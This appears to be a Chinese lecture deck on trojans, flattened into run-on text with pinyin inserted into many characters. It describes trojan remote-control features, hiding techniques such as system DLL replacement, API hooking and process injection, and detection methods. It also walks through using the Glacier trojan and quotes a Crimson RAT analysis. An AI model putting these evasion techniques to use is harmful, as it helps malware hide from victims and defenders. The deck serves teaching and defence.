程控制遠(yuǎn)程控制技術(shù)木馬連接建立后,客戶端端口和服務(wù)器端口之間將會(huì)出現(xiàn)一條通道,客戶端程序可由這條通道與服務(wù)器上的木馬程序取得聯(lián)系,并對(duì)其進(jìn)行遠(yuǎn)程控制,主要包括:獲取目標(biāo)機(jī)器信息記錄用戶事件遠(yuǎn)程操作(1)獲取目標(biāo)機(jī)器信息木馬的一個(gè)主要功能就是竊取被控端計(jì)算機(jī)的信息,然后再把這些信息通過(guò)網(wǎng)絡(luò)連接傳送到控制端。一般來(lái)講,獲取目標(biāo)機(jī)器信息的方法就是調(diào)用相關(guān)的API,通過(guò)函數(shù)返回值,進(jìn)行分解和分析有關(guān)成分,進(jìn)而得到相關(guān)信息。(2)記錄用戶事件木馬程序?yàn)榱诉_(dá)到控制目標(biāo)主機(jī)的目的,通常想知道目標(biāo)主機(jī)用戶目前在干什么,于是記錄用戶事件成了木馬的又一主要功能。其一是記錄被控端計(jì)算機(jī)的鍵盤(pán)和鼠標(biāo)事件,形成一個(gè)文本文件,然后把該文件發(fā)送到控制端,控制端用戶通過(guò)查看文件的方式了解被控端用戶打開(kāi)了哪些程序,敲了那些鍵;其二是在被控端抓取當(dāng)前屏幕,形成一個(gè)位圖文件,然后把該文件發(fā)送到控制端顯示,從而通過(guò)抓取得屏幕知道目標(biāo)用戶的操作行為。(3)遠(yuǎn)程操作遠(yuǎn)程操作重啟被控制端計(jì)算機(jī),或者強(qiáng)制關(guān)閉遠(yuǎn)程計(jì)算機(jī),當(dāng)被控制計(jì)算機(jī)重新啟動(dòng)時(shí),木馬程序重新獲得控制權(quán)。木馬使用者通過(guò)網(wǎng)絡(luò)控制被控端計(jì)算機(jī)的鼠標(biāo)和鍵盤(pán),也可以通過(guò)這種方式啟動(dòng)或停止被控端的應(yīng)用程序。對(duì)遠(yuǎn)程的文件進(jìn)行管理,比如共享被控端的硬盤(pán),之后就可以進(jìn)行任意的文件操作。內(nèi)容提綱2木馬的工作原理3木馬的隱藏技術(shù)4惡意代碼概述1惡意代碼檢測(cè)與防御木馬的隱藏技術(shù)木馬的隱藏技術(shù):?jiǎn)?dòng)隱藏木馬文件/目錄隱藏進(jìn)程隱藏通信隱藏隱藏自己,使得目標(biāo)主機(jī)加載運(yùn)行木馬程序,而不被用戶發(fā)現(xiàn)前面介紹的各種木馬自動(dòng)加載技術(shù)前面介紹的無(wú)文件木馬,通過(guò)其它軟件來(lái)觸發(fā)執(zhí)行誘騙用戶點(diǎn)擊運(yùn)行:如文件類(lèi)型圖標(biāo)欺騙1、啟動(dòng)隱藏用文檔類(lèi)(doc/docx/txt/jpg等)圖標(biāo)來(lái)隱藏可執(zhí)行文件(exe)來(lái)欺騙受害者點(diǎn)擊文件類(lèi)型圖標(biāo)誘騙VisualStudio2013:用C#編寫(xiě)軟件時(shí)指定EXE文件的自定義圖標(biāo)文件類(lèi)型圖標(biāo)誘騙Python:指定exe的自定義軟件圖標(biāo)文件類(lèi)型圖標(biāo)誘騙通過(guò)某種方式使用戶無(wú)法發(fā)現(xiàn)木馬文件和目錄隱藏在其它文件中:如無(wú)文件木馬勾選文件/目錄屬性中的“隱藏”,文件瀏覽器不可見(jiàn)(除非開(kāi)啟顯示所有文件)2、木馬文件/目標(biāo)隱藏3、進(jìn)程隱藏隱藏木馬進(jìn)程,使得任務(wù)管理器等工具不可見(jiàn).偽隱藏是指程序的進(jìn)程仍然存在,只不過(guò)是讓它消失在進(jìn)程列表里。真隱藏則是讓程序徹底的消失,不以一個(gè)進(jìn)程或者服務(wù)的方式工作。3、進(jìn)程隱藏設(shè)置窗口不可見(jiàn)
(從任務(wù)欄中隱藏)把木馬程序注冊(cè)為服務(wù)
(從進(jìn)程列表中隱藏)欺騙查看進(jìn)程的函數(shù)
(從進(jìn)程列表中隱藏)使用可變的高端口
(端口隱藏技術(shù))使用系統(tǒng)服務(wù)端口
(端口隱藏技術(shù))替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL (真隱藏技術(shù))動(dòng)態(tài)嵌入技術(shù)(真隱藏技術(shù))(1)設(shè)置窗口不可見(jiàn)這是最基本的隱藏方式。如果在Windows的任務(wù)欄里出現(xiàn)一個(gè)莫名其妙的圖標(biāo),傻子都會(huì)明白是怎么回事。實(shí)現(xiàn)任務(wù)欄中隱藏,在編程時(shí)是很容易實(shí)現(xiàn)的。以VB為例,只要把form的Visible屬性設(shè)置為False,ShowInTaskBar設(shè)為False,程序就不會(huì)出現(xiàn)在任務(wù)欄里了。(2)把木馬程序注冊(cè)為服務(wù)進(jìn)程列表中不顯示木馬進(jìn)程:在Windows
9X/NT/2000/xp/2003下,把木馬服務(wù)端程序注冊(cè)為一個(gè)服務(wù)就可以了,這樣,程序就會(huì)從任務(wù)列表中消失了,因?yàn)橄到y(tǒng)不認(rèn)為它是一個(gè)進(jìn)程,在任務(wù)管理器中就看不到這個(gè)程序的進(jìn)程。這種方法對(duì)于WindowsNT/2000/xp/2003等操作系統(tǒng)來(lái)說(shuō),通過(guò)服務(wù)管理器,同樣會(huì)發(fā)現(xiàn)在系統(tǒng)中注冊(cè)過(guò)的服務(wù)。(3)欺騙查看進(jìn)程的函數(shù)Windows系統(tǒng)中,一般是通過(guò)API調(diào)用來(lái)查看運(yùn)行的進(jìn)程,常用的API包括PSAPI,PDH,ToolHelpAPI等。進(jìn)程查看軟件API調(diào)用結(jié)果返回替換API調(diào)用返回的數(shù)據(jù),保護(hù)木馬進(jìn)程不被發(fā)現(xiàn)。(4)替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLLDLL(DynamicLinkLibrary,動(dòng)態(tài)鏈接庫(kù))是Windows系統(tǒng)的一種可執(zhí)行文件。DLL文件沒(méi)有程序邏輯,是由多個(gè)功能函數(shù)構(gòu)成的,它并不能獨(dú)立運(yùn)行,需要由程序加載并調(diào)用。正因?yàn)镈LL文件不能獨(dú)立運(yùn)行,所以在進(jìn)程列表中并不會(huì)出現(xiàn)DLL。運(yùn)行DLL文件的最簡(jiǎn)單方法是Rundll32.exe例如我們編寫(xiě)了一個(gè)MyDll.dll,這個(gè)動(dòng)態(tài)鏈接庫(kù)中定義了一個(gè)MyFunc的函數(shù),可以通過(guò)命令執(zhí)行MyFunc函數(shù)的功能:Rundll32MyDll.dllMyFunc(4)替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL攻擊者使用自己的DLL文件替換掉Windows系統(tǒng)中正常的DLL文件。這種方法利用了Windows系統(tǒng)的驅(qū)動(dòng)或DLL,既可以啟動(dòng)木馬,也可以隱藏木馬。不使用進(jìn)程,屬于真隱藏技術(shù)。DLL木馬通過(guò)別的進(jìn)程來(lái)運(yùn)行它,如果這個(gè)進(jìn)程是可信進(jìn)程,就沒(méi)有人會(huì)懷疑它是木馬,那么這個(gè)DLL木馬作為可信進(jìn)程的一部分,就成為了被信賴(lài)的一部分而為所欲為(4)替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL這種方法與一般方法不同,它基本上擺脫了原有的木馬模式---監(jiān)聽(tīng)端口,而采用替代系統(tǒng)功能的方法(改寫(xiě)虛擬設(shè)備驅(qū)動(dòng)程序vxd或動(dòng)態(tài)鏈接庫(kù)DLL文件),木馬會(huì)將修改后的DLL替換系統(tǒng)已知的DLL,并對(duì)所有的函數(shù)調(diào)用進(jìn)行過(guò)濾。(4)替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL攻擊者的DLL文件一般包括有函數(shù)轉(zhuǎn)發(fā)器。在處理函數(shù)調(diào)用時(shí),對(duì)于系統(tǒng)正常的調(diào)用請(qǐng)求,它就把請(qǐng)求直接轉(zhuǎn)發(fā)給被替換的系統(tǒng)DLL進(jìn)行處理;如果是約定的相應(yīng)操作(事先約定好的特殊情況),則按照約定完成所請(qǐng)求的功能。這樣做的好處是沒(méi)有增加新的文件,不需要打開(kāi)新的端口,沒(méi)有新的進(jìn)程,使用常規(guī)的方法監(jiān)測(cè)不到它。(4)替換系統(tǒng)驅(qū)動(dòng)或系統(tǒng)DLL注意:現(xiàn)在Windows對(duì)重要的DLL有保護(hù)機(jī)制Windowssystem32目錄下有一個(gè)dllcache的目錄,下面存放著大量DLL文件和重要的.exe文件,Windows系統(tǒng)一旦發(fā)現(xiàn)被保護(hù)的DLL文件被改動(dòng),它就會(huì)自動(dòng)從dllcache中恢復(fù)這個(gè)文件。所以在替換系統(tǒng)DLL文件之前必須先把dllcache目錄下的對(duì)應(yīng)的系統(tǒng)DLL文件也替換掉。系統(tǒng)重裝、安裝補(bǔ)丁、升級(jí)系統(tǒng)或者檢查數(shù)字簽名等均會(huì)使這種木馬種植方法失效。(5)動(dòng)態(tài)嵌入技術(shù)另一種利用DLL隱藏木馬的方法是動(dòng)態(tài)嵌入技術(shù):將木馬程序代碼嵌入到正在運(yùn)行的進(jìn)程中Windows系統(tǒng)中的每個(gè)進(jìn)程都有自己的私有內(nèi)存空間,一般不允許別的進(jìn)程對(duì)其進(jìn)行操作。但可以通過(guò)窗口hook(鉤子函數(shù))、掛接API、遠(yuǎn)程線程(CreateRemoteThread)等方法進(jìn)入并操作進(jìn)程的私有空間,使木馬的核心代碼運(yùn)行于其它進(jìn)程的內(nèi)存空間。這種方法比DLL替換技術(shù)有更好的隱藏性。(6)進(jìn)程隱藏小結(jié)4、通信隱藏端口隱藏:現(xiàn)在大部分木馬一般在控制主機(jī)后會(huì)在1024以上不易發(fā)現(xiàn)的高端口上駐留;有一些木馬也會(huì)選擇一些常用的端口,如80、23。有些木馬利用80端口時(shí),在收到正常的HTTP請(qǐng)求仍然把它交與Web服務(wù)器處理,只有收到一些特殊約定的數(shù)據(jù)包后,才調(diào)用木馬程序。端口復(fù)用是重復(fù)使用系統(tǒng)中已經(jīng)開(kāi)啟的端口,從而繞過(guò)防火墻的攔截。4、通信隱藏端口監(jiān)聽(tīng)的缺點(diǎn):木馬在等待和運(yùn)行的過(guò)程中,始終向外界打開(kāi)著一個(gè)端口,容易暴露。不使用端口:利用非TCP/UDP協(xié)議,如ICMP協(xié)議。在沒(méi)有激活時(shí)是沒(méi)有端口開(kāi)放的,ICMP木馬監(jiān)聽(tīng)I(yíng)CMP報(bào)文,當(dāng)出現(xiàn)特殊報(bào)文時(shí),它打開(kāi)TCP端口等待控制端的連接。4、通信隱藏:非端口木馬一定要直接與其控制者通信嗎?通過(guò)中間方交換信息電子郵件網(wǎng)盤(pán)網(wǎng)頁(yè)4、通信隱藏案例:灰鴿子木馬技術(shù)小結(jié)近年來(lái),木馬技術(shù)取得了較大的發(fā)展,目前已徹底擺脫了傳統(tǒng)模式下植入方法原始、通信方式單一、隱蔽性差等不足。借助一些新技術(shù),木馬不再依賴(lài)于對(duì)用戶進(jìn)行簡(jiǎn)單的欺騙,也可以不必修改系統(tǒng)注冊(cè)表,不開(kāi)新端口,不在磁盤(pán)上保留新文件,甚至可以沒(méi)有獨(dú)立的進(jìn)程,這些新特點(diǎn)使對(duì)木馬的查殺變得愈加困難,與此同時(shí)卻使得木馬的功能得到了大幅提升。內(nèi)容提綱2木馬的工作原理3木馬的隱藏技術(shù)4惡意代碼概述1惡意代碼檢測(cè)及防御靜態(tài)檢測(cè)(特征檢測(cè)):根據(jù)惡意代碼的特征碼(代碼散列碼、代碼中的關(guān)鍵字、字節(jié)串、特定端口等)進(jìn)行檢測(cè)動(dòng)態(tài)檢測(cè):根據(jù)惡意代碼執(zhí)行后的異常行為進(jìn)行檢測(cè)惡意代碼檢測(cè)惡意代碼檢測(cè):特征檢測(cè)惡意代碼檢測(cè):特征檢測(cè)惡意代碼檢測(cè):特征檢測(cè)惡意代碼檢測(cè):特征檢測(cè)惡意代碼檢測(cè):特征檢測(cè)將惡意代碼中的某段特有的十六進(jìn)制字節(jié)碼或字符串(如某個(gè)特定的域名或IP地址)作為特征碼,如Monkey病毒代碼中的十六進(jìn)制字節(jié)碼“8BFB%%B90002%%268A0534??AAE2F8”惡意代碼檢測(cè):特征檢測(cè)特征碼檢測(cè)技術(shù)的主要優(yōu)點(diǎn)是簡(jiǎn)單、檢測(cè)速度快、準(zhǔn)確率高,不足:不能檢測(cè)未知惡意軟件,對(duì)于惡意代碼變體的容忍度也很低,稍微變形便無(wú)法識(shí)別;用戶需要不斷地升級(jí)(離線或在線)殺毒軟件特征庫(kù),同時(shí)隨著特征庫(kù)越來(lái)越大,檢測(cè)的效率會(huì)越來(lái)越低。惡意代碼檢測(cè):特征檢測(cè)動(dòng)態(tài)檢測(cè)技術(shù)基于定義的惡意代碼異常行為規(guī)則,實(shí)時(shí)監(jiān)控進(jìn)程的動(dòng)態(tài)行為,當(dāng)發(fā)現(xiàn)有違犯規(guī)則的行為出現(xiàn),則給出異常告警。這些行為主要包括:文件行為進(jìn)程行為網(wǎng)絡(luò)行為注冊(cè)表行為惡意代碼檢測(cè):動(dòng)態(tài)檢測(cè)與特征碼靜態(tài)檢測(cè)技術(shù)相比,動(dòng)態(tài)檢測(cè)技術(shù)能夠檢測(cè)未知惡意代碼、惡意代碼的變種,不足:產(chǎn)生的誤報(bào)率較高,且不能識(shí)別出病毒的名稱(chēng)和類(lèi)型等。惡意代碼檢測(cè):動(dòng)態(tài)檢測(cè)沙箱檢測(cè):在沙箱(Sandbox)中運(yùn)行木馬,觀察其行為,應(yīng)對(duì)加殼、多態(tài)、功能代碼動(dòng)態(tài)生成、隱蔽通信等各種逃避檢測(cè)的技術(shù)惡意代碼檢測(cè):動(dòng)態(tài)檢測(cè)沙箱檢測(cè):惡意代碼檢測(cè):動(dòng)態(tài)檢測(cè)機(jī)器學(xué)習(xí):應(yīng)對(duì)海量惡意代碼的檢測(cè)惡意代碼檢測(cè):機(jī)器學(xué)習(xí)方法常見(jiàn)的用于惡意代碼檢測(cè)的機(jī)器學(xué)習(xí)算法有:普通機(jī)器學(xué)習(xí)方法,如支持向量機(jī)(SVM)、隨機(jī)森林(RF)、樸素貝葉斯(NB)等深度機(jī)器學(xué)習(xí)算法,如深度神經(jīng)網(wǎng)絡(luò)(DNN)、卷積神經(jīng)網(wǎng)絡(luò)(CNN)、長(zhǎng)短時(shí)記憶網(wǎng)絡(luò),LSTMN)、圖卷積網(wǎng)絡(luò)(GCN)等惡意代碼檢測(cè):機(jī)器學(xué)習(xí)方法Kaspersky:用機(jī)器學(xué)習(xí)方法檢測(cè)惡意樣本惡意代碼檢測(cè):機(jī)器學(xué)習(xí)方法Kaspersky:精簡(jiǎn)機(jī)器學(xué)習(xí)檢測(cè)模型惡意代碼檢測(cè):機(jī)器學(xué)習(xí)方法優(yōu)勢(shì)在大規(guī)模樣本檢測(cè)能力,不足:檢測(cè)的準(zhǔn)確率還有待提高、對(duì)計(jì)算能力的要求比較高、有監(jiān)督機(jī)器學(xué)習(xí)方法中的樣本標(biāo)注問(wèn)題等,同時(shí)近幾年越來(lái)越多的對(duì)機(jī)器學(xué)習(xí)算法進(jìn)行攻擊的研究,如對(duì)抗樣本,表明少量精心設(shè)計(jì)的樣本即可導(dǎo)致機(jī)器學(xué)習(xí)檢測(cè)算法出錯(cuò)。惡意代碼檢測(cè):機(jī)器學(xué)習(xí)方法惡意代碼防范雖然惡意代碼隱蔽性強(qiáng),種類(lèi)多,攻擊者也設(shè)法采用各種隱藏技術(shù)來(lái)增加被用戶檢測(cè)到的難度,但由于惡意代碼實(shí)質(zhì)上是一個(gè)程序,必須運(yùn)行后才能工作,所以會(huì)在計(jì)算機(jī)的文件系統(tǒng)、系統(tǒng)進(jìn)程表、注冊(cè)表、系統(tǒng)文件和日志等中留下蛛絲馬跡,用戶可以通過(guò)“查、堵、殺”等方法檢測(cè)和清除惡意代碼。惡意代碼防范常用的防范惡意代碼措施:及時(shí)修補(bǔ)漏洞,安裝補(bǔ)丁培養(yǎng)風(fēng)險(xiǎn)意識(shí),不使用來(lái)歷不明的軟件不打開(kāi)可疑短信、郵件及其附件安裝殺毒軟件且不關(guān)閉查殺功能,即時(shí)發(fā)現(xiàn),即時(shí)清除移動(dòng)存儲(chǔ)設(shè)備:用前查殺關(guān)閉不必要的網(wǎng)絡(luò)端口和服務(wù)Webshell防范惡意代碼防范
本章小結(jié)討論更新:將源目錄下的所有文件(含子目錄)拷貝到目的目錄下問(wèn)題一:360認(rèn)為其是勒索病毒的可能原因是什么?問(wèn)題二:360采用的是特征檢測(cè)還是異常檢測(cè)方法?作業(yè)參考內(nèi)容一、木馬實(shí)例(冰河)冰河冰河開(kāi)發(fā)于1999年,跟灰鴿子類(lèi)似,在2005年中美黑客大戰(zhàn)中為中國(guó)黑客增了不少面子。作者:黃鑫(glacier,西安電子科大,2000底加盟安全焦點(diǎn),開(kāi)發(fā)了Xscan)包括兩個(gè)可運(yùn)行的程序G_Server和G_Client,其中前者是木馬的服務(wù)器端,就是用來(lái)植入目標(biāo)主機(jī)的程序,后者是木馬的客戶端,也就是木馬的控制臺(tái)。冰河客戶端界面冰河的主要功能自動(dòng)跟蹤目標(biāo)機(jī)屏幕變化(局域網(wǎng)適用)完全模擬鍵盤(pán)及鼠標(biāo)輸入(局域網(wǎng)適用)記錄各種口令信息獲取系統(tǒng)信息限制系統(tǒng)功能遠(yuǎn)程文件操作注冊(cè)表操作發(fā)送信息點(diǎn)對(duì)點(diǎn)通訊冰河的使用—連接服務(wù)器服務(wù)器端運(yùn)行后,可以在控制臺(tái)上進(jìn)行連接。單擊工具欄上的快捷按鈕“添加主機(jī)”,彈出如圖所示的對(duì)話框,輸入遠(yuǎn)程主機(jī)的相關(guān)信息即可。冰河的使用—連接成功后的信息
連接成功后,則會(huì)顯示遠(yuǎn)程主機(jī)上的信息如硬盤(pán)盤(pán)符等,如圖所示。冰河的使用—搜索服務(wù)器以上直接連接是一種方法,冰河還可以自動(dòng)搜索已經(jīng)中了冰河木馬的主機(jī),只需要簡(jiǎn)單的設(shè)置即可。搜索服務(wù)器搜索到9冰河的使用(續(xù))在9中安裝了木馬服務(wù)器后,就可對(duì)這臺(tái)計(jì)算機(jī)進(jìn)行操作了。冰河的功能非常強(qiáng)大,它有“文件管理器”和“命令控制臺(tái)”兩個(gè)選項(xiàng)卡。點(diǎn)擊“文件管理器”可以管理被入侵的電腦的硬盤(pán)。文件管理器文件管理器—下載文件冰河的使用(續(xù))單擊“命令控制臺(tái)標(biāo)簽”,可以看到這里有眾多的功能。冰河的命令控制臺(tái)獲得系統(tǒng)信息和口令捕獲對(duì)方屏幕向?qū)Ψ桨l(fā)送信息管理對(duì)方的進(jìn)程2024/7/22網(wǎng)絡(luò)入侵與防范講義172控制對(duì)方系統(tǒng)2024/7/22網(wǎng)絡(luò)入侵與防范講義173注冊(cè)表管理甚至可以對(duì)桌面等其它信息設(shè)置冰河的使用(總結(jié))冰河幾乎可以對(duì)入侵的計(jì)算機(jī)進(jìn)行完全的控制,完全可以當(dāng)作一個(gè)遠(yuǎn)程管理工具使用。二、木馬實(shí)例(Crimson)一個(gè)簡(jiǎn)單的遠(yuǎn)程控制型木馬(Crimson)分析(/2020/07/24/crimson-rat-malware-analysis/)拓展IamusingOLEToolstogetthepropertyofexcelfile:cmd>olemeta.py<filename>Crimson分析NextOLEToolcommandIamrunningistogettheOLEdetails:cmd>olevba.py-a<filename>Crimson分析SuspiciousIndicators:VBAcodewillautoexecuteonopeningexcelworkbook.Createdirectoryonthesystem.Writeafileonthesystem.Executeshellcommand.hexstringusedforobfuscation.Crimson分析Now,IamextractingVBAfromexcelfileanddumpingittotxtfile.ForthatcommandIamrunningis:cmd>olevba.py–deofb<filename>>Path\output.exeFromtheVBAcode,IcanseethesubroutinecreatesafolderanddropexecutablefileatlocationC:\ProgramData\Rlmdias\Rlmdias.exeCrimson分析IopenedexcelandnavigatetoVBAProjectbyclickingAlt+F11.Porjectwaspasswordprotect.IremovedpasswordusingGitHubcodeandcheckoutmypreviousbloghowitcanbedone.Postpasswordremoval,IcanseethereisauserForm1whichhastwotextboxandhasahexvalueswhicharePEfileswilldroppeddependsontheOSversionofthevictim32bitor64bitCrimson分析IdebuggedtheVBAcodeanditdroppedazipfileatlocation“C:\ProgramData\Rlmdias\drngervia.zip”andunzipitusingfunctionunSadozipCrimson分析Droppedzipfilehasdrngervia.exefile.andShellcommandexecutetheexecutablefileCrimson分析whenShellexecuted,itopensWindowsfeaturesandasktodownloadandInstall.NetFramework3.5Crimson分析Crimson分析IhaveuseddnSpytodebugthePEfile.Lookingatthecode,itcreatespersistencecreatingaregistryentryCrimson分析ItgetsthelistofrunningprocessonthesystemCrimson分析Itlooksforantivirussoftwarerunningonthesystem.Itsearchesfortheantivirussoftwarefromthebelowlist.Crimson分析Crimson分析IhavealsofoundthehardcodedIPaddress,username.Malwareneverhittothisip[124.115.201.118]Crimson分析Crimson分析以CobalStrike為例遠(yuǎn)程控制過(guò)程中的幾個(gè)名詞三、一個(gè)APT木馬技術(shù)
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024智能語(yǔ)音識(shí)別技術(shù)研發(fā)與許可合同
- 2024年股權(quán)接收協(xié)議書(shū)
- 2024欠款分期付款協(xié)議書(shū)
- 2024年版海產(chǎn)養(yǎng)殖場(chǎng)合作經(jīng)營(yíng)合同3篇
- 2024年汽車(chē)帶牌轉(zhuǎn)讓與二手車(chē)鑒定評(píng)估及保養(yǎng)維修服務(wù)合同3篇
- 2024年設(shè)計(jì)咨詢(xún)服務(wù)正式協(xié)議版B版
- 2024年銷(xiāo)售崗位勞動(dòng)合作合同版B版
- 2024年高端裝備制造人才引進(jìn)與培養(yǎng)協(xié)議
- 2024年裝修工程保養(yǎng)服務(wù)協(xié)議
- 研發(fā)部門(mén)技術(shù)創(chuàng)新與產(chǎn)品研制
- 第四章蛋白質(zhì)吸附和生物相容性
- 套管開(kāi)窗側(cè)鉆施工作業(yè)程序(2014-5)
- 高速公路瀝青路面設(shè)計(jì)計(jì)算書(shū)
- QC小組活動(dòng)管理制度
- 市區(qū)自備井排查整治工作實(shí)施方案
- 8位半萬(wàn)用表大比拼
- 品牌管理部績(jī)效考核指標(biāo)
- 瀝青路面施工監(jiān)理工作細(xì)則
- 公司走賬合同范本
- 獲獎(jiǎng)一等獎(jiǎng)QC課題PPT課件
- 人教版小學(xué)三年級(jí)數(shù)學(xué)上冊(cè)判斷題(共3頁(yè))
評(píng)論
0/150
提交評(píng)論